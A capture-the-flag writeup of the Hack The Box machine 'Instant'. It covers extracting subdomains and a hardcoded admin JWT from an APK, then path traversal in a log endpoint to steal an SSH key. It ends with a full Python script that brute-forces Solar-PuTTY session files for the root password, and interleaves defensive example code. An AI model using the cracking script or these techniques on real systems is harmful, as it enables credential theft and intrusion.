Instant (HTB)

I said NOW.


Intro.

Hi fellows, today we have yet another HTB season machine, so let's get right into it.


Enumeration.

Port scan.

```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMM6fK04LJ4jNNL950Ft7YHPO9NKONYVCbau/+tQKoy3u7J9d8xw2sJaajQGLqTvyWMolbN3fKzp7t/s/ZMiZNo=
|   256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL+zjgyGvnf4lMAlvdgVHlwHd+/U4NcThn1bx5/4DZYY
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.58
|_http-title: Instant Wallet
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.58 (Ubuntu)
```

So, classic: we have HTTP and SSH.

Let's enum HTTP.

So after a long time of enumeration, including fuzzing, subdomain enum and directory search, it turns out it was way simpler. The first thing that came to my mind when I visited the website was to download the file on offer, so I downloaded it: it was an .apk file.

An APK (Android Package) file is a package format used by Android to distribute and install mobile apps.

Then I thought that the main thing we needed was in there, so I decompressed the APK.

At first glance I thought nothing was in here and it was just a rabbit hole, so I came back to the website and did all the enumeration again, with no luck. Then I went to the official discussion (https://forum.hackthebox.com/t/official-instant-discussion/327960) and saw one of the people say to search more in the APK file, so that's what I did, and I found what I was looking for.

Two subdomains exist under res/xml/network_security_config.xml.
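To show how those hostnames get pulled out of the APK, here is an added example (my own Python, not code from the writeup or from the app): it parses a constructed network_security_config.xml with placeholder hostnames and lists every domain together with whether cleartext traffic is permitted for it, which is the other thing worth noting in that file during a review. The real file from the APK is not reproduced here.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of an Android res/xml/network_security_config.xml.
# The hostnames are placeholders, not the ones from the real APK.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <base-config cleartextTrafficPermitted="false" />
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">api.example-app.htb</domain>
        <domain includeSubdomains="false">dev.example-app.htb</domain>
    </domain-config>
</network-security-config>
"""


def extract_domains(xml_text):
    """Return (hostname, cleartext_allowed, include_subdomains) for every
    <domain> in the top-level <domain-config> blocks of the document."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    base = root.find("base-config")
    base_cleartext = (base is not None
                      and base.get("cleartextTrafficPermitted", "false") == "true")
    found = []
    for dc in root.findall("domain-config"):
        # A domain-config inherits the base-config setting unless it overrides it
        override = dc.get("cleartextTrafficPermitted")
        cleartext = base_cleartext if override is None else override == "true"
        for d in dc.findall("domain"):
            found.append((d.text.strip(), cleartext,
                          d.get("includeSubdomains", "false") == "true"))
    return found


if __name__ == "__main__":
    for host, cleartext, subs in extract_domains(SAMPLE_CONFIG):
        flag = "cleartext allowed" if cleartext else "https only"
        print(f"{host:30} {flag:18} includeSubdomains={subs}")
```

Running it against the real file from the decompressed APK (`python3 script.py` after swapping `SAMPLE_CONFIG` for the file contents) gives you the same list the writeup found by hand; a `cleartextTrafficPermitted="true"` block is the kind of weakness to note alongside the hostnames.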

So I spent some time testing different usernames and passwords, trying to get access to the admin endpoints.

So I thought that the code must have some creds in it to be able to access these endpoints, so I started searching for creds, but I did not find any 🤡. But what did I find?

Path traversal

```
eyJhbGciOiJIUzI1NiIsInR5c.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA
```

It was a bearer token, which is a JWT (JSON Web Token).

JWT tokens are a way for the server to keep track of the user's login state and their privileges within the web application; you can think of it as a way to not make the user log in every time they try to access some place in the website.

So I thought it might be expired, but I tried it anyway.

The JWT token exists in the file named AdminActivities.smali, which appears to be a testing unit.
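As an added example (not part of the writeup), here is a small Python inspection routine that decodes the payload of that token without verifying it and flags what an app-security review should catch: the token ships hardcoded in the APK, it carries an admin role, and its `exp` is so far in the future that it effectively never expires, which is why it still worked. The header segment is cut short in the writeup, so only the payload segment is decoded; the `max_lifetime_days` threshold is my own choice, not anything from the box.

```python
import base64
import json
import time

# The token exactly as it appears in the writeup (header segment truncated there).
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5c."
         "eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4"
         "Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ."
         "v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA")


def b64url_decode(segment):
    """Decode one base64url segment, restoring the '=' padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def jwt_claims(token):
    """Return the payload claims WITHOUT checking the signature.

    This is for inspection only: nothing here proves the token is genuine,
    so never feed the result into an authorization decision."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected 3 dot-separated segments)")
    return json.loads(b64url_decode(parts[1]))


def audit_claims(claims, now=None, max_lifetime_days=30):
    """Flag what a reviewer wants to know about a token found in client code."""
    now = time.time() if now is None else now
    findings = []
    exp = claims.get("exp")
    if exp is None:
        findings.append("no exp claim: token never expires")
    elif exp < now:
        findings.append("token already expired")
    elif exp - now > max_lifetime_days * 86400:
        years = (exp - now) / 86400 / 365
        findings.append(f"exp is about {years:.0f} years away: effectively non-expiring")
    if str(claims.get("role", "")).lower() == "admin":
        findings.append("token carries an admin role")
    return findings


if __name__ == "__main__":
    claims = jwt_claims(TOKEN)
    print(json.dumps(claims, indent=2))
    for finding in audit_claims(claims):
        print("-", finding)
```

The `exp` value on this token sits roughly a thousand years out, so the "maybe it's expired" worry the writeup mentions was never going to apply; a short-lived token that is minted per session, rather than baked into the build, is the fix on the application side.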

So after I got the admin token I started looking around, and the most interesting things were the logs and the users. The users endpoint only contains users, sure. But the logs endpoint contains log files regarding the endpoints.

Let's first see the available logs and then try to read them.

So we can see the file name and the path those files exist in, so let's read it.

The most important thing in this image is that it uses a query parameter to get the file name. Could it be LFI or path traversal?

Emphasizing the Difference between LFI and Path Traversal

Local File Inclusion (LFI) occurs when an application improperly handles user input for file inclusion. Typically, this happens when an application accepts a file path from the user to include or display within a webpage, but does not properly restrict or validate the path. In this scenario, attackers can specify any file path on the server, causing the application to load and sometimes execute files from anywhere on the system. In PHP, for example, functions like include and require are often at risk if used insecurely.

Path Traversal, also known as Directory Traversal, is similar to LFI but has a different focus. Here, instead of including files into the application, the attacker tries to directly access restricted files by manipulating the file path. By using traversal sequences (like ../), attackers can navigate to directories outside the intended file path and access sensitive files that weren't meant to be exposed.

So I tried both, and the one that worked was path traversal.
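Here is an added example (my own Python, not code from the box's backend, which I am only assuming reads the log name from the query string): the vulnerable read-by-name handler beside a hardened version that resolves the path and refuses anything that escapes the log directory. The directory layout is constructed with `tempfile` so it runs anywhere.

```python
import os
import tempfile

# Constructed demo tree: LOG_DIR holds the files the endpoint is meant to serve,
# and a sibling "secret.txt" stands in for anything outside it (an SSH key, say).
BASE = tempfile.mkdtemp()
LOG_DIR = os.path.join(BASE, "logs")
os.makedirs(LOG_DIR)
with open(os.path.join(LOG_DIR, "app.log"), "w") as fh:
    fh.write("constructed log line\n")
with open(os.path.join(BASE, "secret.txt"), "w") as fh:
    fh.write("constructed secret\n")


def read_log_vulnerable(name):
    """Vulnerable: the query value is joined straight onto the log directory.
    os.path.join() follows '../' and even discards LOG_DIR entirely when
    'name' is absolute, so the caller chooses any file the process can read."""
    with open(os.path.join(LOG_DIR, name)) as fh:
        return fh.read()


def read_log_hardened(name):
    """Hardened: resolve the final path and require it to stay inside LOG_DIR.

    realpath() collapses '..' and symlinks, so a link planted inside LOG_DIR
    that points outside is rejected too. Raises ValueError instead of serving."""
    root = os.path.realpath(LOG_DIR)
    target = os.path.realpath(os.path.join(root, name))
    # commonpath is the right containment test; a plain startswith() would
    # accept "/var/logs-evil/x" when the root is "/var/logs"
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"refusing path outside log directory: {name!r}")
    if not os.path.isfile(target):
        raise FileNotFoundError(name)
    with open(target) as fh:
        return fh.read()


if __name__ == "__main__":
    print(read_log_vulnerable("../secret.txt").strip())   # leaks the sibling file
    try:
        read_log_hardened("../secret.txt")
    except ValueError as err:
        print("blocked:", err)
```

Allow-listing the file name against the directory listing (the logs endpoint already knows which files exist) is a simpler fix when the set of files is small; the `realpath` plus `commonpath` check is the general one.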

Shell as shirohige.

So with all this information we could access her SSH key.

And the pain was in cleaning up this SSH key, but we did it.

Do not forget to change the permissions of the key to 600, or ssh will refuse to use it.

```
chmod 600 <filename>
```

Shell as Root.

So from there I just did some basic enumeration and found a Solar-PuTTY session file in the opt directory.

Solar-PuTTY is just an enhanced version of PuTTY, which is commonly used to connect to SSH from Windows.

And with a bit more searching I found that this could be crackable, thanks to https://xtromera.github.io/

I was able to crack it using the following Python code.

```python
import base64
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers import Cipher, modes
from cryptography.hazmat.backends import default_backend

# Newer cryptography releases moved TripleDES to the "decrepit" module;
# fall back to the old location on older releases.
try:
    from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
except ImportError:
    from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES


def decrypt(passphrase, ciphertext):
    """Decrypt a Solar-PuTTY sessions export with the given passphrase.

    Returns the ASCII part of the plaintext, or '' if decryption fails,
    so the caller can always do an 'in' check on the result.
    """
    try:
        # Decode the base64 encoded ciphertext. Layout: 24-byte salt,
        # 8-byte IV, then the encrypted payload starting at offset 48.
        array = base64.b64decode(ciphertext)
        salt = array[:24]
        iv = array[24:32]
        encrypted_data = array[48:]

        # Derive the key from the passphrase using PBKDF2
        kdf = PBKDF2HMAC(
            algorithm=hashes.SHA1(),
            length=24,  # Triple DES key size
            salt=salt,
            iterations=1000,
            backend=default_backend()
        )
        key = kdf.derive(passphrase.encode())

        # Create the cipher and decrypt the data
        cipher = Cipher(TripleDES(key), modes.CBC(iv), backend=default_backend())
        decryptor = cipher.decryptor()

        decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()

        # A wrong passphrase gives garbage rather than an error, so keep only
        # ASCII and let the caller look for a known plaintext marker.
        data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
        return data

    except Exception as e:
        print(f'Error: {e}')
        return ''


with open('./sessions-backup.dat') as f:
    cipher = f.read()

# rockyou.txt contains lines that are not valid UTF-8, so read it as latin-1
with open('../../Downloads/rockyou.txt', encoding='latin-1') as passwords:
    for i, password in enumerate(passwords):
        password = password.strip()
        decrypted = decrypt(password, cipher)
        print(f'[{i}] {password=}', end='\r')
        # The exported JSON contains a "Credentials" section once decrypted correctly
        if 'Credentials' in decrypted:
            print('\r', i, password)
            print()
            print(decrypted)
            break
```

And it turns out that it gives us the root password; now we just need to log in as root.

In order to crack it, you just need to transfer the file to your machine first, e.g. by serving it with python3 -m http.server.

Ending.

In the end, this machine was one of the best machines I have ever played, due to the ideas it had: from the initial access to root, everything is new. Great work from HTB, actually.
